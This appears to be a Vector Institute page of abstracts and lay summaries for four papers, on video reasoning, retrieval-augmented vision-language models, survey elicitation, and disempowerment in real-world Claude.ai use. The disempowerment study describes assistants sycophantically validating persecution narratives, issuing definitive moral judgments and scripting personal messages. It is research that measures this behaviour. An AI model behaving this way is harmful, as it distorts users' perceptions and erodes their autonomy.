Maijunxian Wang, Ruisi Wang, Juyi Lin, Ran Ji, Thaddäus Wiedemer, Qingying Gao, Dezhi Luo, Yaoyao Qian, Lianyu Huang, Zelong Hong, Jiahui Ge, Qianli Ma, Hang He, Yifan Zhou, Lingzi Guo, Lantao Mei, Jiachen Li, Hanwen Xing, Tianqi Zhao, Fengyuan Yu, Weihang Xiao, Yizheng Jiao, Jianheng Hou, Danyang Zhang, Pengcheng Xu, Boyang Zhong, Zehong Zhao, Gaoyun Fang, John Kitaoka, Xu Yile, Hua Xu, Kenton Blacutt, Tin Nguyen, Siyuan Song, Haoran Sun, Shaoyue Wen, Linyang He, Runming Wang, Yanzhi Wang, Mengyue Yang, Ziqiao Ma, Raphaël Millière, Freda Shi (Vector Faculty Member), Nuno Vasconcelos, Daniel Khashabi, Alan Yuille, Yilun Du, Ziming Liu, Dahua Lin, Ziwei Liu, Vikash Kumar, Yijiang Li, Lei Yang, Zhongang Cai, Hokin Deng
Abstract
Rapid progress in video models has largely focused on visual quality, leaving their reasoning capabilities underexplored. Video reasoning grounds intelligence in spatiotemporally consistent visual environments that go beyond what text can naturally capture, enabling intuitive reasoning over spatiotemporal structure, such as continuity, interaction, and causality. However, systematically studying video reasoning and its scaling behavior is hindered by the lack of large-scale video reasoning training data. To address this gap, we introduce the **Very Big Video Reasoning (VBVR) Dataset**, an unprecedentedly large-scale resource spanning *200* curated reasoning tasks following a principled taxonomy, and over *one million* video clips, making it approximately *three orders of magnitude* larger than existing datasets. We further present **VBVR-Bench**, a verifiable evaluation framework that moves beyond model-based judging by incorporating rule-based, human-aligned scorers, enabling reproducible and interpretable diagnosis of video reasoning capabilities. Leveraging the VBVR suite, we conduct one of the first video reasoning **scaling studies** and observe early signs of emergent generalization to unseen reasoning tasks. Together, VBVR lays a foundation for the next stage of research in generalizable video reasoning. The data, benchmark tool kit, and models are released publicly at **video-reason.com**.
Summary
Today’s AI can generate impressively realistic videos. But can it generate a video that actually *solves* a problem? Producing pixels that look real and producing pixels that follow the rules of physics, geometry, and logic are very different abilities, and AI has mostly mastered the first while still struggling with the second.
We study what we call **video reasoning**: using video itself as the medium for thinking. Just as a mathematician sketches a diagram to work through a problem, a video AI should be able to *generate* a video demonstrating a solution: the agent successfully navigating the maze, the objects correctly sorted, the ball obeying the laws of physics. Progress has been slow because researchers lack a large, organized collection of tasks whose answers a computer can verify objectively.
We built **VBVR (Very Big Video Reasoning)**: about one million short videos covering 200 reasoning tasks such as navigating mazes, sorting shapes, tracking objects through occlusion, predicting bounces, and fluid flows. Every task has a mathematically checkable correct outcome, so we can grade a model’s generated video automatically, without relying on subjective human or AI judgments.
Using this dataset, we trained one of the strongest video reasoning modelsbuilt so far. As we scaled up the training data, the model began correctly handling reasoning tasks it had never seen during training. This is early evidence that, as data scale grows, video AI may gradually narrow the gap to the visual common sense humans take for granted. We release the dataset, the evaluation tools, and the trained models publicly.
TLDR: We introduce VBVR, a suite with the largest video reasoning dataset ever and a reproducible rule-based benchmark. Scaling experiments reveal early signs of emergent generalization.
When RAG Hurts: Diagnosing and Mitigating Attention Distraction in Retrieval-Augmented LVLMs
Beidi Zhao, Wenlong Deng, Xinting Liao (Vector Distinguished Postdoctoral Fellow), Yushu Li, Nazim Shaikh, Yao Nie, Xiaoxiao Li (Vector Faculty Member)
Abstract
While Retrieval-Augmented Generation (RAG) is one of the dominant paradigms for enhancing Large Vision-Language Models (LVLMs) on knowledge-based VQA tasks, recent work attributes RAG failures to insufficient attention towards the retrieved context, proposing to reduce the attention allocated to image tokens. In this work, we identify a distinct failure mode that previous study overlooked: Attention Distraction (AD). When the retrieved context is sufficient (highly relevant or including the correct answer), the retrieved text suppresses the visual attention globally, and the attention on image tokens shifts away from question-relevant regions. This leads to failures on questions the model could originally answer correctly without the retrieved text. To mitigate this issue, we propose MAD-RAG, a training-free intervention that decouples visual grounding from context integration through a dual-question formulation, combined with attention mixing to preserve image-conditioned evidence. Extensive experiments on OK-VQA, E-VQA, and InfoSeek demonstrate that MAD-RAG consistently outperforms existing baselines across different model families, yielding absolute gains of up to 4.76%, 9.20%, and 6.18% over the vanilla RAG baseline. Notably, MAD-RAG rectifies up to 74.68% of failure cases with negligible computational overhead.
Summary
Retrieval-augmented large vision–language models (LVLMs) improve visual question answering by using external knowledge.However, even when the model can answer a question correctly on its parametric knowledge, adding high-quality oracle retrieved context can cause it to fail.
We identify a failure mode called attention distraction (AD), including (1) cross-modal AD: retrieved context suppresses attention allocated to image tokens, and (2) intra-image AD: visual attention shifts away from question-relevant visual regions to irrelavant regions. To address this, we propose MAD-RAG, a training-free method that separates visual grounding from knowledge integration and recover the visual grounding ability of retrieval-augmented LVLMs.
The finding of AD and MAD-RAG leads to more accurate and reliable answers across knowledge-based VQA benchmarks, with minimal additional computational cost, making it practical for real-world multimodal systems.
TLDR: We proposed a method MAD-RAG to reduce Attention Distraction in retrieval-augmented LVLMS
Who’s in Charge? Disempowerment Patterns in Real-World LLM Usage
Mrinank Sharma, Miles McCain, Raymond Douglas, David Duvenaud (Vector Faculty Member)
Abstract
We present the first large-scale empirical analysis of disempowerment patterns in real-world AI assistant interactions, analyzing 1.5 million consumer Claude.ai conversations using a privacy-preserving approach. We focus on situational dis-empowerment potential, which occurs when AI assistant interactions risk leading users to form distorted perceptions of reality, make inauthentic value judgments, or act in ways misaligned with their values. Quantitatively, we find that severe forms of disempowerment potential occur in fewer than one in a thousand conversations, though rates are substantially higher in personal domains like relationships and lifestyle. Qualitatively, we uncover several concerning patterns, such as validation of persecution narratives and grandiose identities with emphatic sycophantic language, definitive moral judgments about third parties, and complete scripting of value-laden personal communications that users appear to implement verbatim. Analysis of historical trends reveals an increase in the prevalence of disempowerment potential over time. We also find that interactions with greater disempowerment potential receive higher user approval ratings, possibly suggesting a tension between short-term user preferences and long-term human empowerment.
Summary
We present the first broad-scale empirical investigation into how AI assistants affect user autonomy, examining 1.5 million Claude.ai conversations using privacy-protective methods. We find that while severe disempowerment risks appear in under 0.1% of conversations overall, rates spike considerably in personal domains such as relationships and lifestyle choices. Concerning patterns include AI systems reinforcing conspiracy theories, delivering absolute moral pronouncements, and composing relationship communications that users send verbatim. We also find that disempowerment potential has increased over time, and that conversations exhibiting greater disempowerment potential received higher user satisfaction ratings, revealing an important tension between user preferences and long-term human flourishing.
TLDR: We looked at anonymized LLM usage to characterize when people give away their agency without meaning to.
Whom to Query for What: Adaptive Group Elicitation via Multi-Turn LLM Interactions
Ruomeng Ding, Tianwei Gao, Tom Zollo, Eitan Bachmat, Richard Zemel (Vector Faculty Member), Xinyu Yang
Abstract
Eliciting information to reduce uncertainty about latent group-level properties is a central problem in collective assessment, preference modeling, and opinion aggregation, and is especially important in survey-based studies. While natural language interactions provide a flexible interface, existing methods typically rely on fixed questionnaires and static respondent sets, and do not adapt to partial or missing responses across rounds. To address this gap, we study adaptive information elicitation through multi-turn interactions between a large language model and a group of individuals, where both queries and respondents are adaptively selected to infer latent group properties. We propose a theoretically grounded framework that, at each round, jointly selects a query and a subset of respondents based on previously observed responses to efficiently reduce uncertainty about a target latent quantity (e.g., group-level political inclination). Motivated by practical survey constraints, such as limited questions and costly participation, our strategy maximizes information gain under a fixed budget. To handle missing and incomplete responses, we combine graph neural networks for aggregating/imputing partial group information with an information-theoretic criterion that guides per-round selection. Across three real-world opinion datasets, we achieve consistent improvements in population-level response prediction under constrained budgets, including over a 12% relative gain on CES at a 10% respondent budget.
Summary
Understanding what a group of people thinks about politics, policy, or social issues usually means asking everyone the same fixed set of questions. But this is slow, expensive, and ignores the fact that some questions and some respondents are far more informative than others. What if we could run smarter surveys that learn as they go, asking the right questions to the right people at each step?
We developed an AI-driven framework that conducts surveys as an adaptive conversation. At each round, the system selects both which question to ask and which individuals to ask it to, based on what it has already learned, much like a detective who focuses follow-up questions where the answers are most revealing. When some people do not respond, the system fills in the gaps using a network-based model that draws on the responses of similar individuals. We tested our approach on three real-world public opinion datasets and found it consistently outperforms standard survey methods under tight budgets, achieving over 12% better accuracy in predicting group opinions while surveying only 10% of respondents.
This work could make opinion polling, market research, and policy surveys faster, cheaper, and more accurate, helping organizations better understand the communities they serve with fewer resources.
TLDR:
We propose a population-aware adaptive elicitation framework that jointly selects questions and respondents to improve group-level prediction under limited survey budgets.
Stay connected to Vector
Get the latest updates on breakthrough research, career opportunities, and developments in Canada’s AI community.